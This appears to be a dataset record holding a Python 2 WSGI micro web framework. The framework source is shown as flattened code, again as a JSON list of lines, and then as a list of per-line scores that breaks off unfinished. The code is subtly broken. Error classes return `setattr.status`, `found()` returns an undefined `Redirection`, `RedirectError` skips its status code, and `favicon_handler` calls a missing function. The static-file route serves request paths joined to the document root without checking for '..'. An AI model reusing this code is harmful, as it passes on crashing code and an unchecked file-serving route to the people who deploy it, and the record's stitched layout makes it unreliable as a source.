'Expect return a dict when using @view() decorator.') return _wrapper return _decorator _RE_INTERCEPTROR_STARTS_WITH = re.compile(r'^([^\*\?]+)\*?$') _RE_INTERCEPTROR_ENDS_WITH = re.compile(r'^\*([^\*\?]+)$') def _build_pattern_fn(pattern): m = _RE_INTERCEPTROR_STARTS_WITH.match(pattern) if m: return lambda p: p.startswith(m.group(1)) m = _RE_INTERCEPTROR_ENDS_WITH.match(pattern) if m: return lambda p: p.endswith(m.group(1)) raise ValueError('Invalid pattern definition in interceptor.') def interceptor(pattern='/'): def _decorator(func): func.__interceptor__ = _build_pattern_fn(pattern) return func return _decorator def _build_interceptor_fn(func, next): def _wrapper(): if func.__interceptor__(ctx.request.path_info): return func(next) else: return next() return _wrapper def _build_interceptor_chain(last_fn, *interceptors): L = list(interceptors) L.reverse() fn = last_fn for f in L: fn = _build_interceptor_fn(f, fn) return fn def _load_module(model_name): last_dot = model_name.rfind('.') if last_dot == (-1): return __import__(model_name, globals(), locals()) from_module = model_name[:last_dot] import_module = model_name[last_dot+1:] m = __import__(from_module, globals(), locals(), [import_module]) return getattr(m, import_module) class WSGIApplication(object): def __init__(self, document_root=None, **kw): self._running = False self._document_root = document_root self._interceptors = [] self._templage_engine = None self._get_static = {} self._post_static = {} self._get_dynamic = [] self._post_dynamic = [] def _check_not_running(self): if self._running: raise RuntimeError('Cannot modify WSGIApplication when running.') @property def template_engine(self): return self._templage_engine @template_engine.setter def template_engine(self, engine): self._check_not_running() self._templage_engine = engine def add_module(self, mod): self._check_not_running() m = mod if type(mod) == types.ModuleType else _load_module(mod) logging.info('Add module: %s' % m.__name__) for name in dir(m): fn = getattr(m, name) if callable(fn) and hasattr(fn, '__web_route__') and hasattr(fn, '__web_method__'): self.add_url(fn) def add_url(self, func): self._check_not_running() route = Route(func) if route.is_static: if route.method == 'GET': self._get_static[route.path] = route if route.method == 'POST': self._post_static[route.path] = route else: if route.method == 'GET': self._get_dynamic.append(route) if route.method == 'POST': self._post_dynamic.append(route) logging.info('Add route: %s' % str(route)) def add_interceptor(self, func): self._check_not_running() self._interceptors.append(func) logging.info('Add interceptor: %s' % str(func)) def get_wsgi_application(self, debug=False): self._check_not_running() if debug: self._get_dynamic.append(StaticFileRoute()) self._running = True _application = Dict(document_root=self._document_root) def fn_route(): request_method = ctx.request.request_method path_info = ctx.request.path_info if request_method == 'GET': fn = self._get_static.get(path_info, None) if fn: return fn() for fn in self._get_dynamic: args = fn.match(path_info) if args: return fn(*args) raise notfound() if request_method == 'POST': fn = self._post_static.get(path_info, None) if fn: return fn() for fn in self._post_dynamic: args = fn.match(path_info) if args: return fn(*args) raise notfound() raise badrequest() fn_exec = _build_interceptor_chain(fn_route, *self._interceptors) def wsig(env, start_response): ctx.application = _application ctx.request = Request(env) response = ctx.response = Response() try: r = fn_exec() if isinstance(r, Template): r = self._templage_engine(r.template_name, r.model) if isinstance(r, unicode): r = r.encode('utf-8') if r is None: r = [] start_response(response.status, response.headers) return r except RedirectError, e: response.set_header('Location', e.location) start_response(e.status, response.headers) return [] except HttpError, e: start_response(e.status, response.headers) return ['<html><body><h1>', e.status, '</h1></body></html>'] except Exception, e: logging.exception(e) if not debug: start_response('500 Internal Server Error', []) return ['<html><body><h1>500 Internal Server Error</h1></body></html>'] exc_type, exc_value, exc_traceback = sys.exc_info() fp = StringIO() traceback.print_exception( exc_type, exc_value, exc_traceback, file=fp) stacks = fp.getvalue() fp.close() start_response('500 Internal Server Error', []) return [ r'''<html><body><h1>500 Internal Server Error</h1><div style="font-family:Monaco, Menlo, Consolas, 'Courier New', monospace;"><pre>''', stacks.replace('<', '&lt;').replace('>', '&gt;'), '</pre></div></body></html>'] finally: del ctx.application del ctx.request del ctx.response # status = '200 OK' # response_headers = [ # ('Content-Type', 'text/plain') # ] # start_response(status, response_headers) # return ['Hello world from wsgia!\n'] return wsig def run(self, port=9000, host='127.0.0.1'): from wsgiref.simple_server import make_server print('application (%s) will start at %s:%s...' % (self._document_root, host, port)) server = make_server( host, port, self.get_wsgi_application(debug=True)) server.serve_forever() wsgi = WSGIApplication(os.path.dirname(os.path.abspath(__file__))) if __name__ == '__main__': wsgi.run()
[ "#!/usr/bin/env python\n", "# -*- coding: utf-8 -*-\n", "\n", "import types\n", "import os\n", "import re\n", "import cgi\n", "import sys\n", "import time\n", "import datetime\n", "import functools\n", "import mimetypes\n", "import threading\n", "import logging\n", "import urllib\n", "import traceback\n", "\n", "try:\n", " from cStringIO import StringIO\n", "except ImportError:\n", " from StringIO import StringIO\n", "\n", "ctx = threading.local()\n", "\n", "\n", "class Dict(dict):\n", "\n", " def __init__(self, names=(), values=(), **kw):\n", " super(Dict, self).__init__(**kw)\n", " for k, v in zip(names, values):\n", " self[k] = v\n", "\n", " def __getattr__(self, key):\n", " try:\n", " return self[key]\n", " except KeyError:\n", " raise AttributeError(r\"'Dict' object has no attribute '%s'\" % key)\n", "\n", " def __setattr__(self, key, value):\n", " self[key] = value\n", "\n", "\n", "_TIMEDELTA_ZERO = datetime.timedelta(0)\n", "\n", "# timezone as UTC+8:00, UTC-10:00\n", "\n", "_RE_TZ = re.compile('^([\\+\\-])([0-9]{1,2})\\:([0-9]{1,2})$')\n", "\n", "\n", "class UTC(datetime.tzinfo):\n", "\n", " def __init__(self, utc):\n", " utc = str(utc.strip().upper())\n", " mt = _RE_TZ.match(utc)\n", " if mt:\n", " minus = mt.group(1) == '-'\n", " h = int(mt.group(2))\n", " m = int(mt.group(3))\n", " if minus:\n", " h, m = (-h), (-m)\n", " self._utcoffset = datetime.timedelta(hours=h, minutes=m)\n", " self._tzname = 'UTC%s' % utc\n", " else:\n", " raise ValueError('bad utc time zone')\n", "\n", " def utcoffset(self, dt):\n", " return self._utcoffset\n", "\n", " def dst(self, dt):\n", " return _TIMEDELTA_ZERO\n", "\n", " def tzname(self, dt):\n", " return self._tzname\n", "\n", " def __str__(self):\n", " return 'UTC tzinfo object (%s)' % self._tzname\n", "\n", " __repr__ = __str__\n", "\n", "# all known response statues:\n", "\n", "_RESPONSE_STATUSES = {\n", " # Informational\n", " 100: 'Continue',\n", " 101: 'Switching Protocols',\n", " 102: 'Processing',\n", "\n", " # Successful\n", " 200: 'OK',\n", " 201: 'Created',\n", " 202: 'Accepted',\n", " 203: 'Non-Authoritative Information',\n", " 204: 'No Content',\n", " 205: 'Reset Content',\n", " 206: 'Partial Content',\n", " 207: 'Multi Status',\n", " 226: 'IM Used',\n", "\n", " # Redirection\n", " 300: 'Multiple Choices',\n", " 301: 'Moved Permanently',\n", " 302: 'Found',\n", " 303: 'See Other',\n", " 304: 'Not Modified',\n", " 305: 'Use Proxy',\n", " 307: 'Temporary Redirect',\n", "\n", " # Client Error\n", " 400: 'Bad Request',\n", " 401: 'Unauthorized',\n", " 402: 'Payment Required',\n", " 403: 'Forbidden',\n", " 404: 'Not Found',\n", " 405: 'Method Not Allowed',\n", " 406: 'Not Acceptable',\n", " 407: 'Proxy Authentication Required',\n", " 408: 'Request Timeout',\n", " 409: 'Conflict',\n", " 410: 'Gone',\n", " 411: 'Length Required',\n", " 412: 'Precondition Failed',\n", " 413: 'Request Entity Too Large',\n", " 414: 'Request URI Too Long',\n", " 415: 'Unsupported Media Type',\n", " 416: 'Requested Range Not Satisfiable',\n", " 417: 'Expectation Failed',\n", " 418: \"I'm a teapot\",\n", " 422: 'Unprocessable Entity',\n", " 423: 'Locked',\n", " 424: 'Failed Dependency',\n", " 426: 'Upgrade Required',\n", "\n", " # Server Error\n", " 500: 'Internal Server Error',\n", " 501: 'Not Implemented',\n", " 502: 'Bad Gateway',\n", " 503: 'Service Unavailable',\n", " 504: 'Gateway Timeout',\n", " 505: 'HTTP Version Not Supported',\n", " 507: 'Insufficient Storage',\n", " 510: 'Not Extended',\n", "}\n", "\n", "_RE_RESPONSE_STATUS = re.compile(r'^\\d\\d\\d(\\ [\\w\\ ]+)?$')\n", "\n", "_RESPONSE_HEADERS = (\n", " 'Accept-Ranges',\n", " 'Age',\n", " 'Allow',\n", " 'Cache-Control',\n", " 'Connection',\n", " 'Content-Encoding',\n", " 'Content-Language',\n", " 'Content-Length',\n", " 'Content-Location',\n", " 'Content-MD5',\n", " 'Content-Disposition',\n", " 'Content-Range',\n", " 'Content-Type',\n", " 'Date',\n", " 'ETag',\n", " 'Expires',\n", " 'Last-Modified',\n", " 'Link',\n", " 'Location',\n", " 'P3P',\n", " 'Pragma',\n", " 'Proxy-Authenticate',\n", " 'Refresh',\n", " 'Retry-After',\n", " 'Server',\n", " 'Set-Cookie',\n", " 'Strict-Transport-Security',\n", " 'Trailer',\n", " 'Transfer-Encoding',\n", " 'Vary',\n", " 'Via',\n", " 'Warning',\n", " 'WWW-Authenticate',\n", " 'X-Frame-Options',\n", " 'X-XSS-Protection',\n", " 'X-Content-Type-Options',\n", " 'X-Forwarded-Proto',\n", " 'X-Powered-By',\n", " 'X-UA-Compatible',\n", ")\n", "\n", "_RESPONSE_HEADER_DICT = dict(\n", " zip(map(lambda x: x.upper(), _RESPONSE_HEADERS), _RESPONSE_HEADERS))\n", "\n", "_HEADER_X_POWERED_BY = ('X-Powered-By', 'transwarp/1.0')\n", "\n", "\n", "class HttpError(Exception):\n", "\n", " def __init__(self, code):\n", " super(HttpError, self).__init__()\n", " self.status = '%d %s' % (code, _RESPONSE_STATUSES[code])\n", "\n", " def header(self, name, value):\n", " if not hasattr(self, '_headers'):\n", " self._headers = [_HEADER_X_POWERED_BY]\n", " self._headers.append((name, value))\n", "\n", " @property\n", " def headers(self):\n", " if hasattr(self, '_headers'):\n", " return self._headers\n", " return []\n", "\n", " def __str__(self):\n", " return setattr.status\n", "\n", " __repr__ = __str__\n", "\n", "\n", "class RedirectError(HttpError):\n", "\n", " \"\"\"docstring for RedirectError\"\"\"\n", "\n", " def __init__(self, code, location):\n", " super(RedirectError, self).__init__()\n", " self.location = location\n", "\n", " def __str__(self):\n", " return '%s, %s' % (setattr.status, self.location)\n", "\n", " __repr__ = __str__\n", "\n", "\n", "def badrequest():\n", " return HttpError(400)\n", "\n", "\n", "def unauthorized():\n", " return HttpError(401)\n", "\n", "\n", "def forbidden():\n", " return HttpError(403)\n", "\n", "\n", "def notfound():\n", " return HttpError(404)\n", "\n", "\n", "def conflict():\n", " return HttpError(409)\n", "\n", "\n", "def internalerror():\n", " return HttpError(500)\n", "\n", "\n", "def redirect(location):\n", " return RedirectError(301, location)\n", "\n", "\n", "def found(logging):\n", " return Redirection(302, location)\n", "\n", "\n", "def seeother(location):\n", " return RedirectError(303, location)\n", "\n", "\n", "def _to_str(s):\n", " if isinstance(s, str):\n", " return s\n", " if isinstance(s, unicode):\n", " return s.encode('utf-8')\n", " return str(s)\n", "\n", "\n", "def _to_unicode(s, encoding='utf-8'):\n", " return s.decode('utf-8')\n", "\n", "\n", "def _quote(s, encoding='utf-8'):\n", " if isinstance(s, unicode):\n", " s = s.encode(encoding)\n", " return urllib.quote(s)\n", "\n", "\n", "def _unquote(s, encoding='utf-8'):\n", " return urllib.unquote(s).decode(encoding)\n", "\n", "\n", "def get(path):\n", " def _decorator(func):\n", " func.__web_route__ = path\n", " func.__web_method__ = 'GET'\n", " return func\n", " return _decorator\n", "\n", "\n", "def post(path):\n", " def _decorator(func):\n", " func.__web_route__ = path\n", " func.__web_method__ = 'POST'\n", " return func\n", " return _decorator\n", "\n", "_re_route = re.compile(r'(\\:[a-zA-Z_]\\w*)')\n", "\n", "\n", "def _build_regex(path):\n", " r'''\n", " Convert route path to regex.\n", "\n", " >>> _build_regex('/path/to/:file')\n", " '^\\\\/path\\\\/to\\\\/(?P<file>[^\\\\/]+)$'\n", " >>> _build_regex('/:user/:comments/list')\n", " '^\\\\/(?P<user>[^\\\\/]+)\\\\/(?P<comments>[^\\\\/]+)\\\\/list$'\n", " >>> _build_regex(':id-:pid/:w')\n", " '^(?P<id>[^\\\\/]+)\\\\-(?P<pid>[^\\\\/]+)\\\\/(?P<w>[^\\\\/]+)$'\n", " '''\n", " re_list = ['^']\n", " var_list = []\n", " is_var = False\n", " for v in _re_route.split(path):\n", " if is_var:\n", " var_name = v[1:]\n", " var_list.append(var_name)\n", " re_list.append(r'(?P<%s>[^\\/]+)' % var_name)\n", " else:\n", " s = ''\n", " for ch in v:\n", " if ch >= '0' and ch <= '9':\n", " s = s + ch\n", " elif ch >= 'A' and ch <= 'Z':\n", " s = s + ch\n", " elif ch >= 'a' and ch <= 'z':\n", " s = s + ch\n", " else:\n", " s = s + '\\\\' + ch\n", " re_list.append(s)\n", " is_var = not is_var\n", " re_list.append('$')\n", " return ''.join(re_list)\n", "\n", "\n", "class Route(object):\n", "\n", " def __init__(self, func):\n", " self.path = func.__web_route__\n", " self.method = func.__web_method__\n", " self.is_static = _re_route.search(self.path) is None\n", " if not self.is_static:\n", " self.route = re.compile(_build_regex(self.path))\n", " self.func = func\n", "\n", " def match(self, url):\n", " m = self.route.match(url)\n", " if m:\n", " return m.groups()\n", " return None\n", "\n", " def __call__(self, *args):\n", " return self.func(*args)\n", "\n", " def __str__(self):\n", " if self.is_static:\n", " return 'Route(static,%s,path=%s)' % (self.method, self.path)\n", " return 'Route(dynamic,%s,path=%s)' % (self.method, self.path)\n", "\n", " __repr__ = __str__\n", "\n", "\n", "def _static_file_generator(fpath):\n", " BLOCK_SIZE = 8192\n", " with open(fpath, 'rb') as f:\n", " block = f.read(BLOCK_SIZE)\n", " while block:\n", " yield block\n", " block = f.read(BLOCK_SIZE)\n", "\n", "\n", "class StaticFileRoute(object):\n", "\n", " def __init__(self):\n", " self.method = 'GET'\n", " self.is_static = False\n", " self.route = re.compile('^/static/(.+)$')\n", "\n", " def match(self, url):\n", " if url.startswith('/static/'):\n", " return (url[1:],)\n", " return None\n", "\n", " def __call__(self, *args):\n", " fpath = os.path.join(ctx.application.document_root, args[0])\n", " if not os.path.isfile(fpath):\n", " raise notfound()\n", " fext = os.path.splitext(fpath)[1]\n", " ctx.response.content_type = mimetypes.types_map.get(\n", " fext.lower(), 'application/octet-stream')\n", " return _static_file_generator(fpath)\n", "\n", "\n", "def favicon_handler():\n", " return static_file_handler('/favicon.ico')\n", "\n", "\n", "class MultipartFile(object):\n", "\n", " def __init__(self, storage):\n", " self.filename = _to_unicode(storage.filename)\n", " self.file = storage.file\n", "\n", "\n", "class Request(object):\n", "\n", " def __init__(self, environ):\n", " self._environ = environ\n", "\n", " def _parse_input(self):\n", "\n", " def _convert(item):\n", " if isinstance(item, list):\n", " return [_to_unicode(i.value) for i in item]\n", " if item.filename:\n", " return MultipartFile(item)\n", " return _to_unicode(item.value)\n", "\n", " fs = cgi.FieldStorage(\n", " fp=self._environ['wsgi.input'], environ=self._environ, keep_blank_values=True)\n", " inputs = dict()\n", " for key in fs:\n", " inputs[key] = _convert(fs[key])\n", " return inputs\n", "\n", " def _get_raw_input(self):\n", " if not hasattr(self, '_raw_input'):\n", " self._raw_input = self._parse_input()\n", " return self._raw_input\n", "\n", " def __getitem__(self, key):\n", " r = self._get_raw_input()[key]\n", " if isinstance(r, list):\n", " return r[0]\n", " return r\n", "\n", " def get(self, key, default=None):\n", " r = self._get_raw_input().get(key, default)\n", " if isinstance(r, list):\n", " return r[0]\n", " return r\n", "\n", " def gets(self, key):\n", " r = self._get_raw_input()[key]\n", " if isinstance(r, list):\n", " return r[:]\n", " return r\n", "\n", " def input(self, **kw):\n", " copy = Dict(**kw)\n", " raw = self._get_raw_input()\n", " for k, v in raw.iteritems():\n", " copy[k] = v[0] if isinstance(v, list) else v\n", " return copy\n", "\n", " def get_body(self):\n", " fp = self._environ['wsgi.input']\n", " return fp.read()\n", "\n", " @property\n", " def remote_addr(self):\n", " return self._environ.get('REMOTE_ADDR', '0.0.0.0')\n", "\n", " @property\n", " def document_root(self):\n", " return self._environ.get('DOCUMENT_ROOT', '')\n", "\n", " @property\n", " def query_string(self):\n", " return self._environ.get('QUERY_STRING', '')\n", "\n", " @property\n", " def environ(self):\n", " return self._environ\n", "\n", " @property\n", " def request_method(self):\n", " return self._environ['REQUEST_METHOD']\n", "\n", " @property\n", " def path_info(self):\n", " return urllib.unquote(self._environ.get('PATH_INFO', ''))\n", "\n", " @property\n", " def host(self):\n", " return self._environ.get('HTTP_HOST', '')\n", "\n", " def _get_headers(self):\n", " if not hasattr(self, '_headers'):\n", " hdrs = {}\n", " for k, v in self._environ.iteritems():\n", " if k.startswith('HTTP_'):\n", " hdrs[k[5:].replace('_', '-').upper()] = v.decode('utf-8')\n", " self._headers = hdrs\n", " return self._headers\n", "\n", " @property\n", " def headers(self):\n", " return dict(**self._get_headers())\n", "\n", " def header(self, header, default=None):\n", " return self._get_headers().get(header.upper(), default)\n", "\n", " def _get_cookies(self):\n", " if not hasattr(self, '_cookies'):\n", " cookies = {}\n", " cookie_str = self._environ.get('HTTP_COOKIE')\n", " if cookie_str:\n", " for c in cookie_str.split(';'):\n", " pos = c.find('=')\n", " if pos > 0:\n", " cookies[c[:pos].strip()] = _unquote(c[pos+1:])\n", " self._cookies = cookies\n", " return self._cookies\n", "\n", " @property\n", " def cookies(self):\n", " return Dict(**self._get_cookies())\n", "\n", " def cookie(self, name, default=None):\n", " return self._get_cookies().get(name, default)\n", "\n", "UTC_0 = UTC('+00:00')\n", "\n", "\n", "class Response(object):\n", "\n", " def __init__(self):\n", " self._status = '200 OK'\n", " self._headers = {'CONTENT-TYPE': 'text/html; charset=utf-8'}\n", "\n", " def unset_header(self, name):\n", " key = name.upper()\n", " if key not in _RESPONSE_HEADER_DICT:\n", " key = name\n", " if key in self._headers:\n", " del self._headers[key]\n", "\n", " def set_header(self, name, value):\n", " key = name.upper()\n", " if key not in _RESPONSE_HEADER_DICT:\n", " key = name\n", " self._headers[key] = _to_str(value)\n", "\n", " def header(self, name):\n", " key = name.upper()\n", " if key not in _RESPONSE_HEADER_DICT:\n", " key = name\n", " return self._headers.get(key)\n", "\n", " @property\n", " def headers(self):\n", " L = [(_RESPONSE_HEADER_DICT.get(k, k), v)\n", " for k, v in self._headers.iteritems()]\n", " if hasattr(self, '_cookies'):\n", " for v in self._cookies.itervalues():\n", " L.append(('Set-Cookie', v))\n", " L.append(_HEADER_X_POWERED_BY)\n", " return L\n", "\n", " @property\n", " def content_type(self):\n", " return self.header('CONTENT-TYPE')\n", "\n", " @content_type.setter\n", " def content_type(self, value):\n", " if value:\n", " self.set_header('CONTENT-TYPE', value)\n", " else:\n", " self.unset_header('CONTENT-TYPE')\n", "\n", " @property\n", " def content_length(self):\n", " return self.header('CONTENT-LENGTH')\n", "\n", " @content_length.setter\n", " def content_length(self, value):\n", " self.set_header('CONTENT-LENGTH', str(value))\n", "\n", " def delete_cookie(self, name):\n", " self.set_cookie(name, '__deleted__', expires=0)\n", "\n", " def set_cookie(self, name, value, max_age=None, expires=None, path='/', domain=None, secure=False, http_only=True):\n", " if not hasattr(self, '_cookies'):\n", " self._cookies = {}\n", " L = ['%s=%s' % (_quote(name), _quote(value))]\n", " if expires is not None:\n", " if isinstance(expires, (float, int, long)):\n", " L.append('Expires=%s' % datetime.datetime.fromtimestamp(\n", " expires, UTC_0).strftime('%a, %d-%b-%Y %H:%M:%S GMT'))\n", " if isinstance(expires, (datetime.date, datetime.datetime)):\n", " L.append('Expires=%s' % expires.astimezone(\n", " UTC_0).strftime('%a, %d-%b-%Y %H:%M:%S GMT'))\n", " elif isinstance(max_age, (int, long)):\n", " L.append('Max-Age=%d' % max_age)\n", " L.append('Path=%s' % path)\n", " if domain:\n", " L.append('Domain=%s' % domain)\n", " if secure:\n", " L.append('Secure')\n", " if http_only:\n", " L.append('HttpOnly')\n", " self._cookies[name] = '; '.join(L)\n", "\n", " def unset_cookie(self, name):\n", " if hasattr(self, '_cookies'):\n", " if name in self._cookies:\n", " del self._cookies[name]\n", "\n", " @property\n", " def status_code(self):\n", " return int(self._status[:3])\n", "\n", " @property\n", " def status(self):\n", " return self._status\n", "\n", " @status.setter\n", " def status(self, value):\n", " if isinstance(value, (int, long)):\n", " if 100 <= value <= 999:\n", " st = _RESPONSE_STATUSES.get(value, '')\n", " if st:\n", " self._status = '%d %s' % (value, st)\n", " else:\n", " self._status = str(value)\n", " else:\n", " raise ValueError('Bad response code: %d' % value)\n", " elif isinstance(value, basestring):\n", " if isinstance(value, unicode):\n", " value = value.encode('utf-8')\n", " if _RE_RESPONSE_STATUS.match(value):\n", " self._status = value\n", " else:\n", " raise ValueError('Bad response code: %s' % value)\n", " else:\n", " raise TypeError('Bad type of response code.')\n", "\n", "\n", "class Template(object):\n", "\n", " def __init__(self, template_name, **kw):\n", " self.template_name = template_name\n", " self.model = dict(**kw)\n", "\n", "\n", "class TemplateEngine(object):\n", "\n", " def __call__(self, path, model):\n", " return '<!-- override this method to render template -->'\n", "\n", "\n", "class Jinja2TemplateEngine(TemplateEngine):\n", "\n", " def __init__(self, templ_dir, **kw):\n", " from jinja2 import Environment, FileSystemLoader\n", " if not 'autoescape' in kw:\n", " kw['autoescape'] = True\n", " self._env = Environment(loader=FileSystemLoader(templ_dir), **kw)\n", "\n", " def add_filter(self, name, fn_filter):\n", " self._env.filters[name] = fn_filter\n", "\n", " def __call__(self, path, model):\n", " return self._env.get_template(path).render(**model).encode('utf-8')\n", "\n", "\n", "def _default_error_handler(e, start_response, is_debug):\n", " if isinstance(e, HttpError):\n", " logging.info('HttpError: %s' % e.status)\n", " headers = e.headers[:]\n", " headers.append(('Content-Type', 'text/html'))\n", " start_response(e.status, headers)\n", " return ('<html><body><h1>%s</h1></body></html>' % e.status)\n", " logging.exception('Exception:')\n", " start_response('500 Internal Server Error', [\n", " ('Content-Type', 'text/html'), _HEADER_X_POWERED_BY])\n", " if is_debug:\n", " return _debug()\n", " return ('<html><body><h1>500 Internal Server Error</h1><h3>%s</h3></body></html>' % str(e))\n", "\n", "\n", "def view(path):\n", " def _decorator(func):\n", " @functools.wraps(func)\n", " def _wrapper(*args, **kw):\n", " r = func(*args, **kw)\n", " if isinstance(r, dict):\n", " logging.info('return Template')\n", " return Template(path, **r)\n", " raise ValueError(\n", " 'Expect return a dict when using @view() decorator.')\n", " return _wrapper\n", " return _decorator\n", "\n", "\n", "_RE_INTERCEPTROR_STARTS_WITH = re.compile(r'^([^\\*\\?]+)\\*?$')\n", "_RE_INTERCEPTROR_ENDS_WITH = re.compile(r'^\\*([^\\*\\?]+)$')\n", "\n", "\n", "def _build_pattern_fn(pattern):\n", " m = _RE_INTERCEPTROR_STARTS_WITH.match(pattern)\n", " if m:\n", " return lambda p: p.startswith(m.group(1))\n", " m = _RE_INTERCEPTROR_ENDS_WITH.match(pattern)\n", " if m:\n", " return lambda p: p.endswith(m.group(1))\n", " raise ValueError('Invalid pattern definition in interceptor.')\n", "\n", "\n", "def interceptor(pattern='/'):\n", " def _decorator(func):\n", " func.__interceptor__ = _build_pattern_fn(pattern)\n", " return func\n", " return _decorator\n", "\n", "\n", "def _build_interceptor_fn(func, next):\n", " def _wrapper():\n", " if func.__interceptor__(ctx.request.path_info):\n", " return func(next)\n", " else:\n", " return next()\n", " return _wrapper\n", "\n", "\n", "def _build_interceptor_chain(last_fn, *interceptors):\n", " L = list(interceptors)\n", " L.reverse()\n", " fn = last_fn\n", " for f in L:\n", " fn = _build_interceptor_fn(f, fn)\n", " return fn\n", "\n", "\n", "def _load_module(model_name):\n", " last_dot = model_name.rfind('.')\n", " if last_dot == (-1):\n", " return __import__(model_name, globals(), locals())\n", " from_module = model_name[:last_dot]\n", " import_module = model_name[last_dot+1:]\n", " m = __import__(from_module, globals(), locals(), [import_module])\n", " return getattr(m, import_module)\n", "\n", "\n", "class WSGIApplication(object):\n", "\n", " def __init__(self, document_root=None, **kw):\n", " self._running = False\n", " self._document_root = document_root\n", "\n", " self._interceptors = []\n", " self._templage_engine = None\n", "\n", " self._get_static = {}\n", " self._post_static = {}\n", "\n", " self._get_dynamic = []\n", " self._post_dynamic = []\n", "\n", " def _check_not_running(self):\n", " if self._running:\n", " raise RuntimeError('Cannot modify WSGIApplication when running.')\n", "\n", " @property\n", " def template_engine(self):\n", " return self._templage_engine\n", "\n", " @template_engine.setter\n", " def template_engine(self, engine):\n", " self._check_not_running()\n", " self._templage_engine = engine\n", "\n", " def add_module(self, mod):\n", " self._check_not_running()\n", " m = mod if type(mod) == types.ModuleType else _load_module(mod)\n", " logging.info('Add module: %s' % m.__name__)\n", " for name in dir(m):\n", " fn = getattr(m, name)\n", " if callable(fn) and hasattr(fn, '__web_route__') and hasattr(fn, '__web_method__'):\n", " self.add_url(fn)\n", "\n", " def add_url(self, func):\n", " self._check_not_running()\n", " route = Route(func)\n", " if route.is_static:\n", " if route.method == 'GET':\n", " self._get_static[route.path] = route\n", " if route.method == 'POST':\n", " self._post_static[route.path] = route\n", " else:\n", " if route.method == 'GET':\n", " self._get_dynamic.append(route)\n", " if route.method == 'POST':\n", " self._post_dynamic.append(route)\n", " logging.info('Add route: %s' % str(route))\n", "\n", " def add_interceptor(self, func):\n", " self._check_not_running()\n", " self._interceptors.append(func)\n", " logging.info('Add interceptor: %s' % str(func))\n", "\n", " def get_wsgi_application(self, debug=False):\n", " self._check_not_running()\n", " if debug:\n", " self._get_dynamic.append(StaticFileRoute())\n", " self._running = True\n", "\n", " _application = Dict(document_root=self._document_root)\n", "\n", " def fn_route():\n", " request_method = ctx.request.request_method\n", " path_info = ctx.request.path_info\n", " if request_method == 'GET':\n", " fn = self._get_static.get(path_info, None)\n", " if fn:\n", " return fn()\n", " for fn in self._get_dynamic:\n", " args = fn.match(path_info)\n", " if args:\n", " return fn(*args)\n", " raise notfound()\n", " if request_method == 'POST':\n", " fn = self._post_static.get(path_info, None)\n", " if fn:\n", " return fn()\n", " for fn in self._post_dynamic:\n", " args = fn.match(path_info)\n", " if args:\n", " return fn(*args)\n", " raise notfound()\n", " raise badrequest()\n", "\n", " fn_exec = _build_interceptor_chain(fn_route, *self._interceptors)\n", "\n", " def wsig(env, start_response):\n", " ctx.application = _application\n", " ctx.request = Request(env)\n", " response = ctx.response = Response()\n", " try:\n", " r = fn_exec()\n", " if isinstance(r, Template):\n", " r = self._templage_engine(r.template_name, r.model)\n", " if isinstance(r, unicode):\n", " r = r.encode('utf-8')\n", " if r is None:\n", " r = []\n", " start_response(response.status, response.headers)\n", " return r\n", " except RedirectError, e:\n", " response.set_header('Location', e.location)\n", " start_response(e.status, response.headers)\n", " return []\n", " except HttpError, e:\n", " start_response(e.status, response.headers)\n", " return ['<html><body><h1>', e.status, '</h1></body></html>']\n", " except Exception, e:\n", " logging.exception(e)\n", " if not debug:\n", " start_response('500 Internal Server Error', [])\n", " return ['<html><body><h1>500 Internal Server Error</h1></body></html>']\n", "\n", " exc_type, exc_value, exc_traceback = sys.exc_info()\n", " fp = StringIO()\n", " traceback.print_exception(\n", " exc_type, exc_value, exc_traceback, file=fp)\n", " stacks = fp.getvalue()\n", " fp.close()\n", " start_response('500 Internal Server Error', [])\n", " return [\n", " r'''<html><body><h1>500 Internal Server Error</h1><div style=\"font-family:Monaco, Menlo, Consolas, 'Courier New', monospace;\"><pre>''',\n", " stacks.replace('<', '&lt;').replace('>', '&gt;'),\n", " '</pre></div></body></html>']\n", " finally:\n", " del ctx.application\n", " del ctx.request\n", " del ctx.response\n", "\n", " # status = '200 OK'\n", " # response_headers = [\n", " # ('Content-Type', 'text/plain')\n", " # ]\n", " # start_response(status, response_headers)\n", " # return ['Hello world from wsgia!\\n']\n", " return wsig\n", "\n", " def run(self, port=9000, host='127.0.0.1'):\n", " from wsgiref.simple_server import make_server\n", " print('application (%s) will start at %s:%s...' %\n", " (self._document_root, host, port))\n", " server = make_server(\n", " host, port, self.get_wsgi_application(debug=True))\n", " server.serve_forever()\n", "\n", "wsgi = WSGIApplication(os.path.dirname(os.path.abspath(__file__)))\n", "\n", "if __name__ == '__main__':\n", " wsgi.run()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.043478260869565216, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.022727272727272728, 0, 0, 0, 0, 0, 0, 0, 0, 